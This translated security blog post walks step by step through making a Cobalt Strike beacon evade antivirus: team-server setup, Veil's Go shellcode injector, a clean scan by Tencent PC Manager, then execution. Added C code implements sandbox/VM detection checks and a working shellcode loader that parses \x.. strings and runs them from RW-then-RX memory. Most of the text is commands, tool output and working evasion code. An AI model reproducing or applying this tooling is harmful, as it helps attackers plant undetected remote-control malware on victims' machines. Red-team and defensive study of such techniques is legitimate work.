Notes from one attempt at bypassing antivirus

ⅰ亾dé卋堺, submitted 2020-11-24 06:13:15

1. Background

On red-team engagements the target host very often runs antivirus such as 360 or Tencent PC Manager, so the payload we generate is unusable and is frequently deleted outright by the AV. This is genuinely annoying, so I had to stop and look into how AV detects payloads and how to get around it. These notes are a reminder for myself.


2. Tools used


Cobalt Strike: the red-team platform used here for team collaboration and payload generation. It has two parts, a team server and a client; the team server runs only on Linux, the client runs on macOS, Windows and Linux. Both need Java installed.


Related link: https://www.cobaltstrike.com/



Veil: a framework that wraps a payload in a generated executable so that it evades AV.

Related link: https://github.com/Veil-Framework/Veil


3. Evasion steps

3.1 Set up the CS team server and client

A reminder: if the files in the unpacked CS directory do not have the execute bit set, the team server will not start, so grant execute permission to the files in the CS directory first:

chmod +x <filename>

Run the CS team server. The first argument is the address the client will connect to (check it with ifconfig), the second is the team server password. The 123456 below is a demo value; use a strong password, since anyone who can reach port 50050 with it gets full control of the team server. Note the SHA256 fingerprint line as well: the client shows the same fingerprint on first connection, which is how you confirm you are talking to your own server.

(base) root@kali:~/python/cs4.0# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.91.156  netmask 255.255.255.0  broadcast 192.168.91.255
        inet6 fe80::20c:33ff:dfbf:dfa3  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:bf:3a:23  txqueuelen 1000  (Ethernet)
        RX packets 130003  bytes 193285222 (184.3 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 81397  bytes 4399635 (4.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        device interrupt 19  base 0x2000

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 24  bytes 1356 (1.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 24  bytes 1356 (1.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

(base) root@kali:~/python/cs4.0# ./teamserver 192.168.91.156 123456
[*] Will use existing X509 certificate and keystore (for SSL)
[+] Team server is up on 50050
[*] SHA256 hash of SSL cert is: 
[+] Listener: test started!

Run the CS client

Start the CS client, fill in the team server address and the password from the previous step, and click [Connect] to open the client.


3.2 Generate a payload with CS

Create a listener with the HTTP type.

In the payload generator click [Choose], pick that listener, generate the payload and save it in a folder for the next step. Veil's custom-shellcode prompt (used below) expects the shellcode as a single line in \x.. form, so generate it in that form rather than as a ready-made executable.

3.3 Install Veil

On Kali the quick-install commands are recommended:

apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

The install is slow and may need a proxy to reach the download sources.

The setup script downloads and installs the dependencies by itself; a successful install looks like this:


Start veil and enter

use 1

to select Veil-Evasion. It ships 41 payloads in total; enter list to see them all:

===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Available Payloads:

  1)  autoit/shellcode_inject/flat.py
  2)  auxiliary/coldwar_wrapper.py
  3)  auxiliary/macro_converter.py
  4)  auxiliary/pyinstaller_wrapper.py
  5)  c/meterpreter/rev_http.py
  6)  c/meterpreter/rev_http_service.py
  7)  c/meterpreter/rev_tcp.py
  8)  c/meterpreter/rev_tcp_service.py
  9)  cs/meterpreter/rev_http.py
  10)  cs/meterpreter/rev_https.py
  11)  cs/meterpreter/rev_tcp.py
  12)  cs/shellcode_inject/base64.py
  13)  cs/shellcode_inject/virtual.py
  14)  go/meterpreter/rev_http.py
  15)  go/meterpreter/rev_https.py
  16)  go/meterpreter/rev_tcp.py
  17)  go/shellcode_inject/virtual.py
  18)  lua/shellcode_inject/flat.py
  19)  perl/shellcode_inject/flat.py
  20)  powershell/meterpreter/rev_http.py
  21)  powershell/meterpreter/rev_https.py
  22)  powershell/meterpreter/rev_tcp.py
  23)  powershell/shellcode_inject/psexec_virtual.py
  24)  powershell/shellcode_inject/virtual.py
  25)  python/meterpreter/bind_tcp.py
  26)  python/meterpreter/rev_http.py
  27)  python/meterpreter/rev_https.py
  28)  python/meterpreter/rev_tcp.py
  29)  python/shellcode_inject/aes_encrypt.py
  30)  python/shellcode_inject/arc_encrypt.py
  31)  python/shellcode_inject/base64_substitution.py
  32)  python/shellcode_inject/des_encrypt.py
  33)  python/shellcode_inject/flat.py
  34)  python/shellcode_inject/letter_substitution.py
  35)  python/shellcode_inject/pidinject.py
  36)  python/shellcode_inject/stallion.py
  37)  ruby/meterpreter/rev_http.py
  38)  ruby/meterpreter/rev_https.py
  39)  ruby/meterpreter/rev_tcp.py
  40)  ruby/shellcode_inject/base64.py
  41)  ruby/shellcode_inject/flat.py

We pick the Go shellcode injector (payload 17) to wrap the shellcode:

Veil/Evasion>: use 17
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 Payload Information:

  Name:    Golang Flat Shellcode Injector
  Language:  go
  Rating:    Normal
  Description:    Golang VirtualAlloc method for inline shellcode
                  injection

Payload: go/shellcode_inject/virtual selected

 Required Options:

Name              Value     Description
----              -----     -----------
BADMACS           FALSE     Check for VM based MAC addresses
CLICKTRACK        X         Require X number of clicks before execution
COMPILE_TO_EXE    Y         Compile to an executable
CURSORCHECK       FALSE     Check for mouse movements
DISKSIZE          X         Check for a minimum number of gigs for hard disk
HOSTNAME          X         Optional: Required system hostname
INJECT_METHOD     Virtual   Virtual or Heap
MINPROCS          X         Minimum number of running processes
PROCCHECK         FALSE     Check for active VM processes
PROCESSORS        X         Optional: Minimum number of processors
RAMCHECK          FALSE     Check for at least 3 gigs of RAM
SLEEP             X         Optional: Sleep "Y" seconds, check if accelerated
USERNAME          X         Optional: The required user account
USERPROMPT        FALSE     Prompt user prior to injection
UTCCHECK          FALSE     Check if system uses UTC time

 Available Commands:

  back          Go back to Veil-Evasion
  exit          Completely exit Veil
  generate      Generate the payload
  options       Show the shellcode's options
  set           Set shellcode option
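Most of the options in that table are sandbox checks: the wrapper refuses to inject if the host looks like an analysis VM. The page leaves them all at their defaults (FALSE / X), but it is worth knowing what they do, and worth noticing that the Kali box in the ifconfig output above has an eth0 MAC starting 00:0c:29, a VMware OUI, so BADMACS=TRUE would have stopped the payload on that very machine. The block below is an added example, not the page's code and not Veil's Go template: four of the checks (BADMACS, PROCESSORS, HOSTNAME, SLEEP) re-implemented in portable C so they can be run on Linux or macOS. The OUI list and the "at least the requested time must really pass" rule for SLEEP are this example's own choices.

```c
/*
 * Added example, not code from the page or from Veil's Go template: portable
 * C versions of four of the host checks in Veil's options table (BADMACS,
 * PROCESSORS, HOSTNAME, SLEEP). The VM OUI list and the SLEEP rule are this
 * example's own choices.
 */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1
#endif
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* OUIs commonly seen on virtual NICs; extend the list for your own lab. */
static const char *const VM_OUIS[] = {
    "00:0C:29", "00:50:56", "00:05:69", /* VMware */
    "08:00:27",                         /* VirtualBox */
    "00:15:5D",                         /* Hyper-V */
    "00:1C:42",                         /* Parallels */
    "52:54:00",                         /* QEMU/KVM */
};

/* BADMACS: 1 if the MAC (aa:bb:cc:dd:ee:ff, any case) starts with a VM OUI. */
int mac_is_vm(const char *mac) {
    char oui[9];
    if (strlen(mac) < 8) return 0;
    for (int i = 0; i < 8; i++) oui[i] = (char)toupper((unsigned char)mac[i]);
    oui[8] = '\0';
    for (size_t i = 0; i < sizeof VM_OUIS / sizeof VM_OUIS[0]; i++)
        if (strcmp(oui, VM_OUIS[i]) == 0) return 1;
    return 0;
}

/* PROCESSORS: 1 if at least min_cpus CPUs are online (sandboxes often have 1). */
int enough_processors(long min_cpus) {
    return sysconf(_SC_NPROCESSORS_ONLN) >= min_cpus;
}

/* HOSTNAME: 1 if this machine's hostname equals the required one. */
int hostname_matches(const char *required) {
    char buf[256];
    if (gethostname(buf, sizeof buf) != 0) return 0;
    buf[sizeof buf - 1] = '\0';
    return strcmp(buf, required) == 0;
}

/* SLEEP: sleep ms milliseconds and return 1 only if at least that much
 * monotonic time really elapsed. Sandboxes that fast-forward sleeps to
 * outrun a delay return early, which this detects. */
int sleep_not_accelerated(long ms) {
    struct timespec start, end;
    struct timespec req = { ms / 1000, (ms % 1000) * 1000000L };
    clock_gettime(CLOCK_MONOTONIC, &start);
    while (nanosleep(&req, &req) != 0 && errno == EINTR) { /* resume after a signal */ }
    clock_gettime(CLOCK_MONOTONIC, &end);
    long long elapsed_ns = (end.tv_sec - start.tv_sec) * 1000000000LL
                         + (end.tv_nsec - start.tv_nsec);
    return elapsed_ns >= (long long)ms * 1000000LL;
}

/* Veil treats the enabled checks as preconditions: any failure means "do not
 * inject". Same idea here, with the MAC passed in so it can be unit-tested. */
int host_looks_real(const char *mac, long min_cpus, long sleep_ms) {
    return !mac_is_vm(mac) && enough_processors(min_cpus)
        && sleep_not_accelerated(sleep_ms);
}

int main(void) {
    /* Constructed input: the eth0 MAC from the Kali ifconfig output on this page. */
    printf("00:0c:29:bf:3a:23 is a VM NIC: %d\n", mac_is_vm("00:0c:29:bf:3a:23"));
    printf("host looks real: %d\n", host_looks_real("3c:52:82:01:02:03", 1, 50));
    return 0;
}
```

The same checks cut both ways: a detonation sandbox that spoofs a vendor OUI, reports several CPUs and keeps sleeps honest passes all of them, which is exactly what commercial sandboxes have learned to do, so these checks buy time rather than guarantee evasion.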

Enter generate:

[go/shellcode_inject/virtual>>]: generate

 [?] Generate or supply custom shellcode?

     1 - Ordnance (default)
     2 - MSFVenom
     3 - Custom shellcode string
     4 - File with shellcode (\x41\x42..)
     5 - Binary file with shellcode

 [>] Please enter the number of your choice: 3
 [>] Please enter custom shellcode (one line, no quotes, \x00.. format): 

Paste the shellcode CS generated at that prompt and give the output a base name, and Veil compiles the wrapper. Veil appends .exe itself, so enter a bare name here; the helloworld.exe typed below ends up as helloworld.exe.exe.

 [*] Using pre-generated shellcode...
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [>] Please enter the base name for output files (default is payload): helloworld.exe
runtime/internal/sys
runtime/internal/atomic
runtime
errors
internal/race
sync/atomic
math
internal/syscall/windows/sysdll
unicode/utf16
unicode/utf8
sync
io
syscall
strconv
internal/syscall/windows
internal/syscall/windows/registry
time
reflect
os
fmt
command-line-arguments
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Language: go
 [*] Payload Module: go/shellcode_inject/virtual
 [*] Executable written to: /var/lib/veil/output/compiled/helloworld.exe.exe
 [*] Source code written to: /var/lib/veil/output/source/helloworld.exe.go

The shell prints where the compiled payload and its Go source were written. Copy the executable to a VM with Tencent PC Manager installed and see whether it gets flagged.

Then scan the freshly generated payload with PC Manager.

It passes the PC Manager scan. Double-click it, wait for the beacon to check in to CS, and move on to post-exploitation. Keep in mind that a clean scan from one product on one day says nothing about other engines, about the same engine after its next signature update, or about behavioural detection once the beacon is running and talking to the team server.
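What the wrapper Veil just built actually does is small: it turns the pasted \x.. string into bytes, allocates memory, copies the bytes in, makes the region executable and jumps to it; the payload description above calls this the "Golang VirtualAlloc method for inline shellcode injection". The block below is an added example, not the page's code and not Veil's or Cobalt Strike's, that does the same two steps in C: parse_shellcode() accepts the exact format option 3 asks for, and run_shellcode() uses VirtualAlloc/VirtualProtect on Windows and mmap/mprotect elsewhere, switching the region from RW to RX only after the copy rather than allocating it RWX. The six- or eight-byte sample "shellcode" is constructed for this example and merely returns 42 to the caller so the block can run safely; a real beacon stage would take its place.

```c
/*
 * Added example, not code from the page, Veil or Cobalt Strike: parse a
 * "\x41\x42.." shellcode string and run it from freshly allocated memory, the
 * way Veil's go/shellcode_inject/virtual wrapper does. The sample shellcode
 * below is constructed for this example and only returns 42.
 */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1
#endif
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS MAP_ANON
#endif
#endif

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Parse "\x41\x42" (the format Veil's option 3 asks for). Returns the number
 * of bytes written to out, or -1 on malformed input: stray characters, a short
 * escape, or more bytes than out_len. Spaces, quotes and newlines are skipped
 * so a line copied out of a C-style listing still parses. */
long parse_shellcode(const char *text, uint8_t *out, size_t out_len) {
    size_t n = 0;
    for (const char *p = text; *p; ) {
        if (*p == ' ' || *p == '"' || *p == '\n' || *p == '\r') { p++; continue; }
        if (p[0] != '\\' || (p[1] != 'x' && p[1] != 'X')) return -1;
        int hi = hexval(p[2]), lo = p[2] ? hexval(p[3]) : -1;
        if (hi < 0 || lo < 0) return -1;
        if (n >= out_len) return -1;
        out[n++] = (uint8_t)((hi << 4) | lo);
        p += 4;
    }
    return (long)n;
}

/* Allocate RW, copy, flip to RX, call. Returns the shellcode's integer return
 * value, or -1 if the allocation or the protection change fails. */
int run_shellcode(const uint8_t *code, size_t len) {
    int (*fn)(void);
    int result;
#ifdef _WIN32
    DWORD old;
    void *mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!mem) return -1;
    memcpy(mem, code, len);
    if (!VirtualProtect(mem, len, PAGE_EXECUTE_READ, &old)) { VirtualFree(mem, 0, MEM_RELEASE); return -1; }
    FlushInstructionCache(GetCurrentProcess(), mem, len);
    memcpy(&fn, &mem, sizeof fn);   /* void* -> function pointer without a cast warning */
    result = fn();
    VirtualFree(mem, 0, MEM_RELEASE);
#else
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return -1;
    memcpy(mem, code, len);
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) { munmap(mem, len); return -1; }
    __builtin___clear_cache((char *)mem, (char *)mem + len);   /* needed on arm64 */
    memcpy(&fn, &mem, sizeof fn);
    result = fn();
    munmap(mem, len);
#endif
    return result;
}

/* Constructed sample in the \x.. format: return 42 to the caller. */
#if defined(__x86_64__) || defined(__i386__) || defined(_M_X64) || defined(_M_IX86)
#define SAMPLE_SHELLCODE "\\xb8\\x2a\\x00\\x00\\x00\\xc3"            /* mov eax,42 ; ret */
#elif defined(__aarch64__) || defined(_M_ARM64)
#define SAMPLE_SHELLCODE "\\x40\\x05\\x80\\x52\\xc0\\x03\\x5f\\xd6"  /* mov w0,#42 ; ret */
#else
#error "no sample shellcode for this architecture"
#endif

/* Parse the sample and run it: 42 on success, -1 on any failure. */
int demo(void) {
    uint8_t buf[64];
    long n = parse_shellcode(SAMPLE_SHELLCODE, buf, sizeof buf);
    if (n < 0) return -1;
    return run_shellcode(buf, (size_t)n);
}

int main(void) {
    printf("shellcode returned %d\n", demo());
    return 0;
}
```

Two points follow from the code. First, the string that goes into the binary is the raw CS stage, so the wrapper is only as "unknown" as that stage is; the Go runtime around it is what changed the file hash and the static look, and a memory scan after injection sees the same beacon it always did. Second, a private anonymous mapping that is writable and executable at the same time is one of the cheapest heuristics a scanner or EDR can flag, which is why the example allocates RW, copies, then switches to RX instead of asking for RWX up front.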


The above is for security research only; do not use it for anything illegal. Hold your own line and stay within the law.

This article is shared from the WeChat public account 攻防SRC (SNNUSRC).
